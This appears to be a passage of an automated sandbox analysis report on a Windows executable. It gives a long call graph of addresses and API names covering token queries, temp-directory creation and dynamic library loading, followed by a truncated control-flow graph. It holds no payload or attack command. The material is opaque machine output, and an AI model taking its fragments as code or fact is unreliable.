_invalid_parameter_noinfo 37 API calls 17350->17352 17357 7ff652ee1681 17351->17357 17352->17357 17354 7ff652ee1776 17353->17354 17355 7ff652ee5cb4 _get_daylight 11 API calls 17353->17355 17356 7ff652ee5cb4 _get_daylight 11 API calls 17354->17356 17354->17357 17358 7ff652ee176b 17355->17358 17359 7ff652ee1820 17356->17359 17357->17081 17360 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17358->17360 17361 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17359->17361 17360->17354 17361->17357 17363 7ff652eee781 17362->17363 17364 7ff652ee512f 17362->17364 17363->17364 17370 7ff652ef4154 17363->17370 17366 7ff652eee7d4 17364->17366 17367 7ff652ee513f 17366->17367 17368 7ff652eee7ed 17366->17368 17367->17081 17368->17367 17383 7ff652ef34a0 17368->17383 17371 7ff652eebf00 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17370->17371 17372 7ff652ef4163 17371->17372 17373 7ff652ef41ae 17372->17373 17382 7ff652ef11a8 EnterCriticalSection 17372->17382 17373->17364 17384 7ff652eebf00 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 17383->17384 17385 7ff652ef34a9 17384->17385 17393 7ff652ee5b5c EnterCriticalSection 17386->17393 17395 7ff652ed288c 17394->17395 17396 7ff652ee52b4 49 API calls 17395->17396 17397 7ff652ed28dd 17396->17397 17398 7ff652ee5cb4 _get_daylight 11 API calls 17397->17398 17399 7ff652ed28e2 17398->17399 17413 7ff652ee5cd4 17399->17413 17402 7ff652ed1ee0 49 API calls 17403 7ff652ed2911 __scrt_get_show_window_mode 17402->17403 17404 7ff652ed8de0 57 API calls 17403->17404 17405 7ff652ed2946 17404->17405 17406 7ff652ed2983 MessageBoxA 17405->17406 17407 7ff652ed294b 17405->17407 17409 7ff652ed299d 17406->17409 17408 7ff652ed8de0 57 API calls 17407->17408 17410 7ff652ed2965 MessageBoxW 17408->17410 17411 7ff652edc010 _wfindfirst32i64 8 API calls 17409->17411 17410->17409 17412 7ff652ed29ad 17411->17412 17412->16740 17414 7ff652eec078 _get_daylight 11 API calls 17413->17414 17415 7ff652ee5ceb 17414->17415 17416 7ff652ed28e9 17415->17416 17417 7ff652eef948 _get_daylight 11 API calls 17415->17417 17420 7ff652ee5d2b 17415->17420 17416->17402 17418 7ff652ee5d20 17417->17418 17419 7ff652eeb700 __free_lconv_mon 11 API calls 17418->17419 17419->17420 17420->17416 17425 7ff652ef0018 17420->17425 17423 7ff652eeb6b8 _wfindfirst32i64 17 API calls 17424 7ff652ee5d70 17423->17424 17430 7ff652ef0035 17425->17430 17426 7ff652ef003a 17427 7ff652ee5d51 17426->17427 17428 7ff652ee5cb4 _get_daylight 11 API calls 17426->17428 17427->17416 17427->17423 17429 7ff652ef0044 17428->17429 17431 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17429->17431 17430->17426 17430->17427 17432 7ff652ef0084 17430->17432 17431->17427 17432->17427 17433 7ff652ee5cb4 _get_daylight 11 API calls 17432->17433 17433->17429 17435 7ff652ed8f82 WideCharToMultiByte 17434->17435 17436 7ff652ed8f14 WideCharToMultiByte 17434->17436 17437 7ff652ed8faf 17435->17437 17441 7ff652ed3f6b 17435->17441 17438 7ff652ed8f3e 17436->17438 17442 7ff652ed8f55 17436->17442 17439 7ff652ed29c0 57 API calls 17437->17439 17440 7ff652ed29c0 57 API calls 17438->17440 17439->17441 17440->17441 17441->16751 17441->16752 17442->17435 17443 7ff652ed8f6b 17442->17443 17444 7ff652ed29c0 57 API calls 17443->17444 17444->17441 17446 7ff652ed40ea 17445->17446 17447 7ff652ed8de0 57 API calls 17446->17447 17448 7ff652ed4112 17447->17448 17463 7ff652ed8d00 FindFirstFileExW 17448->17463 17451 7ff652edc010 _wfindfirst32i64 8 API calls 17452 7ff652ed3f88 17451->17452 17452->16749 17452->16758 17454 7ff652ed4352 17453->17454 17455 7ff652ed8de0 57 API calls 17454->17455 17456 7ff652ed4380 CreateFileW 17455->17456 17457 7ff652ed43b7 GetFinalPathNameByHandleW CloseHandle 17456->17457 17462 7ff652ed441f 17456->17462 17458 7ff652ed43e3 __vcrt_InitializeCriticalSectionEx 17457->17458 17457->17462 17461 7ff652ed8ef0 59 API calls 17458->17461 17459 7ff652edc010 _wfindfirst32i64 8 API calls 17460 7ff652ed3fb9 17459->17460 17460->16749 17461->17462 17462->17459 17464 7ff652ed8d50 17463->17464 17465 7ff652ed8d3d FindClose 17463->17465 17466 7ff652edc010 _wfindfirst32i64 8 API calls 17464->17466 17465->17464 17467 7ff652ed411c 17466->17467 17467->17451 17469 7ff652ed7dee 17468->17469 17470 7ff652eeb1d3 17468->17470 17469->16776 17470->17469 17471 7ff652eeb25c __std_exception_copy 37 API calls 17470->17471 17472 7ff652eeb200 17471->17472 17472->17469 17473 7ff652eeb6b8 _wfindfirst32i64 17 API calls 17472->17473 17474 7ff652eeb230 17473->17474 17476 7ff652ed4060 116 API calls 17475->17476 17477 7ff652ed1ac6 17476->17477 17478 7ff652ed1c74 17477->17478 17480 7ff652ed84c0 83 API calls 17477->17480 17479 7ff652edc010 _wfindfirst32i64 8 API calls 17478->17479 17481 7ff652ed1c88 17479->17481 17482 7ff652ed1afe 17480->17482 17481->16786 17508 7ff652ed3e80 17481->17508 17507 7ff652ed1b2f 17482->17507 17514 7ff652ee1004 17482->17514 17484 7ff652ee097c 74 API calls 17484->17478 17485 7ff652ed1b18 17486 7ff652ed1b34 17485->17486 17487 7ff652ed1b1c 17485->17487 17518 7ff652ee0ccc 17486->17518 17489 7ff652ed2870 59 API calls 17487->17489 17489->17507 17491 7ff652ed1b4f 17493 7ff652ed2870 59 API calls 17491->17493 17492 7ff652ed1b67 17494 7ff652ee1004 73 API calls 17492->17494 17493->17507 17495 7ff652ed1bb4 17494->17495 17496 7ff652ed1bde 17495->17496 17497 7ff652ed1bc6 17495->17497 17499 7ff652ee0ccc _fread_nolock 53 API calls 17496->17499 17498 7ff652ed2870 59 API calls 17497->17498 17498->17507 17500 7ff652ed1bf3 17499->17500 17501 7ff652ed1c0e 17500->17501 17502 7ff652ed1bf9 17500->17502 17521 7ff652ee0a40 17501->17521 17503 7ff652ed2870 59 API calls 17502->17503 17503->17507 17506 7ff652ed2b10 59 API calls 17506->17507 17507->17484 17509 7ff652ed1ee0 49 API calls 17508->17509 17510 7ff652ed3e9d 17509->17510 17510->16796 17512 7ff652ed1ee0 49 API calls 17511->17512 17513 7ff652ed4170 17512->17513 17513->16786 17515 7ff652ee1034 17514->17515 17527 7ff652ee0d94 17515->17527 17517 7ff652ee104d 17517->17485 17539 7ff652ee0cec 17518->17539 17522 7ff652ed1c22 17521->17522 17523 7ff652ee0a49 17521->17523 17522->17506 17522->17507 17524 7ff652ee5cb4 _get_daylight 11 API calls 17523->17524 17525 7ff652ee0a4e 17524->17525 17528 7ff652ee0dfe 17527->17528 17529 7ff652ee0dbe 17527->17529 17528->17529 17531 7ff652ee0e0a 17528->17531 17530 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17529->17530 17532 7ff652ee0de5 17530->17532 17538 7ff652ee5b5c EnterCriticalSection 17531->17538 17532->17517 17540 7ff652ee0d16 17539->17540 17551 7ff652ed1b49 17539->17551 17541 7ff652ee0d62 17540->17541 17542 7ff652ee0d25 __scrt_get_show_window_mode 17540->17542 17540->17551 17552 7ff652ee5b5c EnterCriticalSection 17541->17552 17545 7ff652ee5cb4 _get_daylight 11 API calls 17542->17545 17547 7ff652ee0d3a 17545->17547 17549 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17547->17549 17549->17551 17551->17491 17551->17492 17554 7ff652ed889f GetTokenInformation 17553->17554 17555 7ff652ed8921 __std_exception_destroy 17553->17555 17556 7ff652ed88c0 GetLastError 17554->17556 17557 7ff652ed88cb 17554->17557 17558 7ff652ed8934 CloseHandle 17555->17558 17559 7ff652ed893a 17555->17559 17556->17555 17556->17557 17557->17555 17560 7ff652ed88e7 GetTokenInformation 17557->17560 17558->17559 17559->16805 17560->17555 17561 7ff652ed890a 17560->17561 17561->17555 17562 7ff652ed8914 ConvertSidToStringSidW 17561->17562 17562->17555 17564 7ff652ed8975 17563->17564 17580 7ff652ee5508 17564->17580 17568 7ff652ed2c50 17567->17568 17569 7ff652ee52b4 49 API calls 17568->17569 17570 7ff652ed2c9b __scrt_get_show_window_mode 17569->17570 17571 7ff652ed8de0 57 API calls 17570->17571 17572 7ff652ed2cd0 17571->17572 17573 7ff652ed2cd5 17572->17573 17574 7ff652ed2d0d MessageBoxA 17572->17574 17575 7ff652ed8de0 57 API calls 17573->17575 17576 7ff652ed2d27 17574->17576 17577 7ff652ed2cef MessageBoxW 17575->17577 17578 7ff652edc010 _wfindfirst32i64 8 API calls 17576->17578 17577->17576 17579 7ff652ed2d37 17578->17579 17579->16815 17584 7ff652ee5562 17580->17584 17581 7ff652ee5587 17582 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17581->17582 17586 7ff652ee55b1 17582->17586 17583 7ff652ee55c3 17598 7ff652ee38c0 17583->17598 17584->17581 17584->17583 17588 7ff652edc010 _wfindfirst32i64 8 API calls 17586->17588 17587 7ff652ee56a4 17589 7ff652eeb700 __free_lconv_mon 11 API calls 17587->17589 17590 7ff652ed8998 17588->17590 17589->17586 17590->16812 17592 7ff652ee56ca 17592->17587 17594 7ff652ee56d4 17592->17594 17593 7ff652ee5679 17595 7ff652eeb700 __free_lconv_mon 11 API calls 17593->17595 17597 7ff652eeb700 __free_lconv_mon 11 API calls 17594->17597 17595->17586 17596 7ff652ee5670 17596->17587 17596->17593 17597->17586 17599 7ff652ee38fe 17598->17599 17600 7ff652ee38ee 17598->17600 17601 7ff652ee3907 17599->17601 17606 7ff652ee3935 17599->17606 17604 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17600->17604 17602 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17601->17602 17603 7ff652ee392d 17602->17603 17603->17587 17603->17592 17603->17593 17603->17596 17604->17603 17606->17600 17606->17603 17609 7ff652ee42d4 17606->17609 17642 7ff652ee3d20 17606->17642 17679 7ff652ee34b0 17606->17679 17610 7ff652ee4387 17609->17610 17611 7ff652ee4316 17609->17611 17614 7ff652ee43e0 17610->17614 17615 7ff652ee438c 17610->17615 17612 7ff652ee43b1 17611->17612 17613 7ff652ee431c 17611->17613 17698 7ff652ee2684 17612->17698 17616 7ff652ee4321 17613->17616 17617 7ff652ee4350 17613->17617 17621 7ff652ee43f7 17614->17621 17622 7ff652ee43ea 17614->17622 17627 7ff652ee43ef 17614->17627 17618 7ff652ee438e 17615->17618 17619 7ff652ee43c1 17615->17619 17616->17621 17623 7ff652ee4327 17616->17623 17617->17623 17617->17627 17630 7ff652ee439d 17618->17630 17632 7ff652ee4330 17618->17632 17705 7ff652ee2274 17619->17705 17712 7ff652ee4fdc 17621->17712 17622->17612 17622->17627 17628 7ff652ee4362 17623->17628 17623->17632 17638 7ff652ee434b 17623->17638 17640 7ff652ee4420 17627->17640 17716 7ff652ee2a94 17627->17716 17628->17640 17692 7ff652ee4dc4 17628->17692 17630->17612 17633 7ff652ee43a2 17630->17633 17632->17640 17682 7ff652ee4a88 17632->17682 17636 7ff652ee4e88 37 API calls 17633->17636 17633->17640 17634 7ff652edc010 _wfindfirst32i64 8 API calls 17635 7ff652ee471a 17634->17635 17635->17606 17636->17638 17637 7ff652ee50f0 45 API calls 17641 7ff652ee460c 17637->17641 17638->17637 17638->17640 17638->17641 17640->17634 17641->17640 17723 7ff652eef7b8 17641->17723 17643 7ff652ee3d44 17642->17643 17644 7ff652ee3d2e 17642->17644 17645 7ff652ee3d84 17643->17645 17648 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17643->17648 17644->17645 17646 7ff652ee4387 17644->17646 17647 7ff652ee4316 17644->17647 17645->17606 17651 7ff652ee43e0 17646->17651 17652 7ff652ee438c 17646->17652 17649 7ff652ee43b1 17647->17649 17650 7ff652ee431c 17647->17650 17648->17645 17657 7ff652ee2684 38 API calls 17649->17657 17653 7ff652ee4321 17650->17653 17654 7ff652ee4350 17650->17654 17658 7ff652ee43f7 17651->17658 17660 7ff652ee43ea 17651->17660 17665 7ff652ee43ef 17651->17665 17655 7ff652ee438e 17652->17655 17656 7ff652ee43c1 17652->17656 17653->17658 17661 7ff652ee4327 17653->17661 17654->17661 17654->17665 17659 7ff652ee4330 17655->17659 17668 7ff652ee439d 17655->17668 17663 7ff652ee2274 38 API calls 17656->17663 17675 7ff652ee434b 17657->17675 17662 7ff652ee4fdc 45 API calls 17658->17662 17664 7ff652ee4a88 47 API calls 17659->17664 17674 7ff652ee4420 17659->17674 17660->17649 17660->17665 17661->17659 17666 7ff652ee4362 17661->17666 17661->17675 17662->17675 17663->17675 17664->17675 17667 7ff652ee2a94 38 API calls 17665->17667 17665->17674 17669 7ff652ee4dc4 46 API calls 17666->17669 17666->17674 17667->17675 17668->17649 17670 7ff652ee43a2 17668->17670 17669->17675 17672 7ff652ee4e88 37 API calls 17670->17672 17670->17674 17671 7ff652edc010 _wfindfirst32i64 8 API calls 17673 7ff652ee471a 17671->17673 17672->17675 17673->17606 17674->17671 17675->17674 17676 7ff652ee50f0 45 API calls 17675->17676 17678 7ff652ee460c 17675->17678 17676->17678 17677 7ff652eef7b8 46 API calls 17677->17678 17678->17674 17678->17677 17757 7ff652ee18f8 17679->17757 17683 7ff652ee4aae 17682->17683 17684 7ff652ee14b0 12 API calls 17683->17684 17685 7ff652ee4afe 17684->17685 17686 7ff652eef320 46 API calls 17685->17686 17693 7ff652ee4df9 17692->17693 17694 7ff652ee4e3e 17693->17694 17695 7ff652ee4e17 17693->17695 17696 7ff652ee50f0 45 API calls 17693->17696 17694->17638 17697 7ff652eef7b8 46 API calls 17695->17697 17696->17695 17697->17694 17699 7ff652ee26b7 17698->17699 17700 7ff652ee26e6 17699->17700 17702 7ff652ee27a3 17699->17702 17704 7ff652ee2723 17700->17704 17735 7ff652ee1558 17700->17735 17703 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17702->17703 17703->17704 17704->17638 17706 7ff652ee22a7 17705->17706 17707 7ff652ee22d6 17706->17707 17709 7ff652ee2393 17706->17709 17708 7ff652ee1558 12 API calls 17707->17708 17711 7ff652ee2313 17707->17711 17708->17711 17710 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17709->17710 17710->17711 17711->17638 17713 7ff652ee501f 17712->17713 17715 7ff652ee5023 __crtLCMapStringW 17713->17715 17743 7ff652ee5078 17713->17743 17715->17638 17717 7ff652ee2ac7 17716->17717 17718 7ff652ee2af6 17717->17718 17720 7ff652ee2bb3 17717->17720 17719 7ff652ee1558 12 API calls 17718->17719 17722 7ff652ee2b33 17718->17722 17719->17722 17721 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17720->17721 17721->17722 17722->17638 17724 7ff652eef7e9 17723->17724 17732 7ff652eef7f7 17723->17732 17724->17732 17732->17641 17736 7ff652ee158f 17735->17736 17742 7ff652ee157e 17735->17742 17737 7ff652eee3ac _fread_nolock 12 API calls 17736->17737 17736->17742 17738 7ff652ee15c0 17737->17738 17742->17704 17744 7ff652ee509e 17743->17744 17745 7ff652ee5096 17743->17745 17744->17715 17746 7ff652ee50f0 45 API calls 17745->17746 17746->17744 17758 7ff652ee193f 17757->17758 17759 7ff652ee192d 17757->17759 17761 7ff652ee1989 17758->17761 17762 7ff652ee194d 17758->17762 17760 7ff652ee5cb4 _get_daylight 11 API calls 17759->17760 17763 7ff652ee1932 17760->17763 17766 7ff652ee1d05 17761->17766 17768 7ff652ee5cb4 _get_daylight 11 API calls 17761->17768 17764 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 17762->17764 17765 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17763->17765 17771 7ff652ee193d 17764->17771 17765->17771 17767 7ff652ee5cb4 _get_daylight 11 API calls 17766->17767 17766->17771 17769 7ff652ee1f99 17767->17769 17770 7ff652ee1cfa 17768->17770 17772 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17769->17772 17773 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 17770->17773 17771->17606 17772->17771 17773->17766 17775 7ff652ed7b76 17774->17775 17776 7ff652ed7b9a 17775->17776 17777 7ff652ed7bed GetTempPathW 17775->17777 17778 7ff652ed7d70 61 API calls 17776->17778 17779 7ff652ed7c02 17777->17779 17780 7ff652ed7ba6 17778->17780 17813 7ff652ed2810 17779->17813 17825 7ff652ed7630 17780->17825 17790 7ff652ed7c1b __std_exception_destroy 17791 7ff652ed7cc6 17790->17791 17796 7ff652ed7c51 17790->17796 17817 7ff652ee92c8 17790->17817 17820 7ff652ed8d80 17790->17820 17798 7ff652ed8de0 57 API calls 17796->17798 17811 7ff652ed7c8a __std_exception_destroy 17796->17811 17814 7ff652ed2835 17813->17814 17815 7ff652ee5508 48 API calls 17814->17815 17816 7ff652ed2854 17815->17816 17816->17790 17859 7ff652ee8ef4 17817->17859 17821 7ff652ed8d90 17820->17821 17822 7ff652ed8da6 CreateDirectoryW 17820->17822 17822->17790 17826 7ff652ed763c 17825->17826 17827 7ff652ed8de0 57 API calls 17826->17827 17828 7ff652ed765e 17827->17828 17829 7ff652ed7666 17828->17829 17830 7ff652ed7679 ExpandEnvironmentStringsW 17828->17830 17831 7ff652ed2b10 59 API calls 17829->17831 17832 7ff652ed769f __std_exception_destroy 17830->17832 18098 7ff652ed172e 18097->18098 18099 7ff652ed1716 18097->18099 18101 7ff652ed1734 18098->18101 18102 7ff652ed1758 18098->18102 18100 7ff652ed2b10 59 API calls 18099->18100 18104 7ff652ed1722 18100->18104 18227 7ff652ed12a0 18101->18227 18190 7ff652ed7e20 18102->18190 18104->16847 18108 7ff652ed177d 18111 7ff652ed2870 59 API calls 18108->18111 18109 7ff652ed17a9 18112 7ff652ed4060 116 API calls 18109->18112 18110 7ff652ed174f 18110->16847 18114 7ff652ed1793 18111->18114 18115 7ff652ed17be 18112->18115 18113 7ff652ed2b10 59 API calls 18113->18110 18114->16847 18116 7ff652ed17de 18115->18116 18117 7ff652ed17c6 18115->18117 18119 7ff652ee1004 73 API calls 18116->18119 18118 7ff652ed2b10 59 API calls 18117->18118 18120 7ff652ed17d5 18118->18120 18121 7ff652ed17ef 18119->18121 18125 7ff652ee097c 74 API calls 18120->18125 18122 7ff652ed1813 18121->18122 18123 7ff652ed17f3 18121->18123 18140 7ff652ed2d66 18139->18140 18141 7ff652ed1ee0 49 API calls 18140->18141 18142 7ff652ed2d99 18141->18142 18143 7ff652ed3e80 49 API calls 18142->18143 18170 7ff652ed30ca 18142->18170 18144 7ff652ed2e07 18143->18144 18145 7ff652ed3e80 49 API calls 18144->18145 18146 7ff652ed2e18 18145->18146 18147 7ff652ed2e75 18146->18147 18148 7ff652ed2e39 18146->18148 18149 7ff652ed3190 75 API calls 18147->18149 18349 7ff652ed3190 18148->18349 18151 7ff652ed2e73 18149->18151 18152 7ff652ed2eb4 18151->18152 18153 7ff652ed2ef6 18151->18153 18357 7ff652ed77b0 18152->18357 18155 7ff652ed3190 75 API calls 18153->18155 18157 7ff652ed2f20 18155->18157 18161 7ff652ed3190 75 API calls 18157->18161 18167 7ff652ed2fbc 18157->18167 18164 7ff652ed2f52 18161->18164 18162 7ff652ed1ea0 59 API calls 18165 7ff652ed300f 18162->18165 18164->18167 18168 7ff652ed3190 75 API calls 18164->18168 18165->18170 18167->18162 18183 7ff652ed30cf 18167->18183 18181 7ff652ed3128 18183->18181 18394 7ff652ee5860 18183->18394 18191 7ff652ed7e30 18190->18191 18192 7ff652ed1ee0 49 API calls 18191->18192 18193 7ff652ed7e71 18192->18193 18194 7ff652ed7ef1 18193->18194 18270 7ff652ed3ff0 18193->18270 18196 7ff652edc010 _wfindfirst32i64 8 API calls 18194->18196 18198 7ff652ed1775 18196->18198 18198->18108 18198->18109 18199 7ff652ed7f2b 18276 7ff652ed79d0 18199->18276 18201 7ff652ed7d70 61 API calls 18206 7ff652ed7ea2 __std_exception_destroy 18201->18206 18203 7ff652ed7ee0 18207 7ff652ed2c30 59 API calls 18203->18207 18204 7ff652ed7f14 18205 7ff652ed2c30 59 API calls 18204->18205 18205->18199 18206->18203 18206->18204 18207->18194 18228 7ff652ed12b2 18227->18228 18229 7ff652ed4060 116 API calls 18228->18229 18230 7ff652ed12e2 18229->18230 18231 7ff652ed1301 18230->18231 18232 7ff652ed12ea 18230->18232 18234 7ff652ee1004 73 API calls 18231->18234 18233 7ff652ed2b10 59 API calls 18232->18233 18239 7ff652ed12fa __std_exception_destroy 18233->18239 18235 7ff652ed1313 18234->18235 18236 7ff652ed133d 18235->18236 18237 7ff652ed1317 18235->18237 18241 7ff652ed1380 18236->18241 18242 7ff652ed1358 18236->18242 18238 7ff652ed2870 59 API calls 18237->18238 18240 7ff652ed132e 18238->18240 18243 7ff652edc010 _wfindfirst32i64 8 API calls 18239->18243 18244 7ff652ee097c 74 API calls 18240->18244 18246 7ff652ed1453 18241->18246 18247 7ff652ed139a 18241->18247 18245 7ff652ed2870 59 API calls 18242->18245 18248 7ff652ed1444 18243->18248 18244->18239 18249 7ff652ed1373 18245->18249 18254 7ff652ee0ccc _fread_nolock 53 API calls 18246->18254 18259 7ff652ed14ab 18246->18259 18260 7ff652ed13b3 18246->18260 18250 7ff652ed1050 98 API calls 18247->18250 18248->18110 18248->18113 18251 7ff652ee097c 74 API calls 18249->18251 18252 7ff652ed13ab 18250->18252 18251->18239 18255 7ff652ed14c2 __std_exception_destroy 18252->18255 18252->18260 18253 7ff652ee097c 74 API calls 18256 7ff652ed13bf 18253->18256 18254->18246 18262 7ff652ee097c 74 API calls 18255->18262 18257 7ff652ed79d0 64 API calls 18256->18257 18261 7ff652ed2870 59 API calls 18259->18261 18260->18253 18261->18255 18262->18239 18271 7ff652ed3ffa 18270->18271 18272 7ff652ed8de0 57 API calls 18271->18272 18273 7ff652ed4022 18272->18273 18274 7ff652edc010 _wfindfirst32i64 8 API calls 18273->18274 18275 7ff652ed404a 18274->18275 18275->18199 18275->18201 18275->18206 18277 7ff652ed79e0 18276->18277 18278 7ff652ed1ee0 49 API calls 18277->18278 18350 7ff652ed31c4 18349->18350 18351 7ff652ee52b4 49 API calls 18350->18351 18352 7ff652ed31ea 18351->18352 18353 7ff652ed31fb 18352->18353 18409 7ff652ee65dc 18352->18409 18355 7ff652edc010 _wfindfirst32i64 8 API calls 18353->18355 18356 7ff652ed3219 18355->18356 18356->18151 18358 7ff652ed77be 18357->18358 18359 7ff652ed4060 116 API calls 18358->18359 18360 7ff652ed77ed 18359->18360 18410 7ff652ee6605 18409->18410 18411 7ff652ee65f9 18409->18411 18451 7ff652ee5788 18410->18451 18426 7ff652ee5ef0 18411->18426 18452 7ff652ee57ac 18451->18452 18453 7ff652ee57a7 18451->18453 18452->18453 18669 7ff652ee6918 18667->18669 18668 7ff652ee693e 18670 7ff652ee5cb4 _get_daylight 11 API calls 18668->18670 18669->18668 18672 7ff652ee6971 18669->18672 18671 7ff652ee6943 18670->18671 18673 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 18671->18673 18674 7ff652ee6984 18672->18674 18675 7ff652ee6977 18672->18675 18677 7ff652ed40b9 18673->18677 18686 7ff652eeb9e0 18674->18686 18678 7ff652ee5cb4 _get_daylight 11 API calls 18675->18678 18677->16922 18678->18677 18699 7ff652ef11a8 EnterCriticalSection 18686->18699 19047 7ff652ee98c4 19046->19047 19050 7ff652ee93a0 19047->19050 19051 7ff652ee93ea 19050->19051 19052 7ff652ee93bb 19050->19052 19060 7ff652ee5b5c EnterCriticalSection 19051->19060 19053 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 19052->19053 19056 7ff652ee93db 19053->19056 19062 7ff652ee0773 19061->19062 19063 7ff652ee07a1 19061->19063 19064 7ff652eeb5cc _invalid_parameter_noinfo 37 API calls 19062->19064 19070 7ff652ee0793 19063->19070 19064->19070 19073 7ff652ed4060 116 API calls 19072->19073 19074 7ff652ed15b7 19073->19074 19075 7ff652ed15bf 19074->19075 19076 7ff652ed15e0 19074->19076 19077 7ff652ed2b10 59 API calls 19075->19077 19078 7ff652ee1004 73 API calls 19076->19078 19079 7ff652ed15cf 19077->19079 19080 7ff652ed15f1 19078->19080 19079->16941 19081 7ff652ed15f5 19080->19081 19082 7ff652ed1611 19080->19082 19083 7ff652ed2870 59 API calls 19081->19083 19084 7ff652ed1641 19082->19084 19085 7ff652ed1621 19082->19085 19093 7ff652ed160c __std_exception_destroy 19083->19093 19086 7ff652ed1656 19084->19086 19092 7ff652ed166d 19084->19092 19088 7ff652ed2870 59 API calls 19085->19088 19089 7ff652ed1050 98 API calls 19086->19089 19087 7ff652ee097c 74 API calls 19090 7ff652ed16e7 19087->19090 19088->19093 19089->19093 19090->16941 19091 7ff652ee0ccc _fread_nolock 53 API calls 19091->19092 19092->19091 19092->19093 19094 7ff652ed16ae 19092->19094 19093->19087 19095 7ff652ed2870 59 API calls 19094->19095 19095->19093 19097 7ff652ed19c3 19096->19097 19099 7ff652ed195f 19096->19099 19097->16954 19098 7ff652ee5860 45 API calls 19098->19099 19099->19097 19099->19098 19101 7ff652ed8de0 57 API calls 19100->19101 19102 7ff652ed8487 LoadLibraryExW 19101->19102 19103 7ff652ed84a4 __std_exception_destroy 19102->19103 19103->16968 19105 7ff652ed714c GetProcAddress 19104->19105 19110 7ff652ed7129 19104->19110 19105->19110 19164 7ff652ed5de0 19163->19164 19165 7ff652ed1ee0 49 API calls 19164->19165 19166 7ff652ed5e12 19165->19166 19167 7ff652ed5e3b 19166->19167 19168 7ff652ed5e1b 19166->19168 19170 7ff652ed5e92 19167->19170 19171 7ff652ed4140 49 API calls 19167->19171 19169 7ff652ed2b10 59 API calls 19168->19169 19190 7ff652ed5e31 19169->19190 19172 7ff652ed4140 49 API calls 19170->19172 19175 7ff652ed5e5c 19171->19175 19173 7ff652ed5eab 19172->19173 19174 7ff652ed5ec9 19173->19174 19178 7ff652ed2b10 59 API calls 19173->19178 19179 7ff652ed8470 58 API calls 19174->19179 19176 7ff652ed5e7a 19175->19176 19180 7ff652ed2b10 59 API calls 19175->19180 19181 7ff652ed3ff0 57 API calls 19176->19181 19177 7ff652edc010 _wfindfirst32i64 8 API calls 19182 7ff652ed344e 19177->19182 19178->19174 19183 7ff652ed5ed6 19179->19183 19180->19176 19184 7ff652ed5e84 19181->19184 19182->16989 19191 7ff652ed5f30 19182->19191 19185 7ff652ed5edb 19183->19185 19186 7ff652ed5efd 19183->19186 19184->19170 19189 7ff652ed8470 58 API calls 19184->19189 19187 7ff652ed29c0 57 API calls 19185->19187 19261 7ff652ed53f0 GetProcAddress 19186->19261 19187->19190 19189->19170 19190->19177 19345 7ff652ed4ff0 19191->19345 19193 7ff652ed5f54 19194 7ff652ed5f5c 19193->19194 19195 7ff652ed5f6d 19193->19195 19262 7ff652ed5412 19261->19262 19263 7ff652ed5430 GetProcAddress 19261->19263 19265 7ff652ed29c0 57 API calls 19262->19265 19263->19262 19264 7ff652ed5455 GetProcAddress 19263->19264 19264->19262 19266 7ff652ed547a GetProcAddress 19264->19266 19267 7ff652ed5425 19265->19267 19266->19262 19267->19190 19347 7ff652ed5015 19345->19347 19346 7ff652ed501d 19346->19193 19347->19346 19350 7ff652ed51af 19347->19350 19387 7ff652ee74f4 19347->19387 19348 7ff652ed535a __std_exception_destroy 19348->19193 19349 7ff652ed4450 47 API calls 19349->19350 19350->19348 19350->19349 19388 7ff652ee7524 19387->19388 19391 7ff652ee69f0 19388->19391 19618 7ff652edb1cc 19619 7ff652eda5d3 19618->19619 19621 7ff652eda656 19618->19621 19620 7ff652edb850 12 API calls 19619->19620 19619->19621 19620->19621

                                                    Executed Functions

                                                    Function 00007FF652ED1000 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 293windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 63 7ff652ed1000-7ff652ed39b6 call 7ff652ee0750 call 7ff652ee0748 call 7ff652ed89b0 call 7ff652ee0748 call 7ff652edbfb0 call 7ff652ee5ae0 call 7ff652ee66e8 call 7ff652ed1ea0 81 7ff652ed3b5f 63->81 82 7ff652ed39bc-7ff652ed39cc call 7ff652ed3f00 63->82 83 7ff652ed3b64-7ff652ed3b84 call 7ff652edc010 81->83 82->81 87 7ff652ed39d2-7ff652ed39e5 call 7ff652ed3dd0 82->87 87->81 91 7ff652ed39eb-7ff652ed3a12 call 7ff652ed7d70 87->91 94 7ff652ed3a54-7ff652ed3a7c call 7ff652ed8250 call 7ff652ed1ca0 91->94 95 7ff652ed3a14-7ff652ed3a23 call 7ff652ed7d70 91->95 105 7ff652ed3a82-7ff652ed3a98 call 7ff652ed1ca0 94->105 106 7ff652ed3b2d-7ff652ed3b3e 94->106 95->94 101 7ff652ed3a25-7ff652ed3a2b 95->101 103 7ff652ed3a2d-7ff652ed3a35 101->103 104 7ff652ed3a37-7ff652ed3a51 call 7ff652ee576c call 7ff652ed8250 101->104 103->104 104->94 117 7ff652ed3a9a-7ff652ed3ab2 call 7ff652ed2b10 105->117 118 7ff652ed3ab7-7ff652ed3aba 105->118 109 7ff652ed3b92-7ff652ed3b95 106->109 110 7ff652ed3b40-7ff652ed3b47 106->110 113 7ff652ed3bab-7ff652ed3bc3 call 7ff652ed8de0 109->113 114 7ff652ed3b97-7ff652ed3b9d 109->114 110->109 115 7ff652ed3b49-7ff652ed3b51 call 7ff652ed8b80 110->115 132 7ff652ed3bc5-7ff652ed3bcc 113->132 133 7ff652ed3bce-7ff652ed3bd5 SetDllDirectoryW 113->133 119 7ff652ed3b9f-7ff652ed3ba9 114->119 120 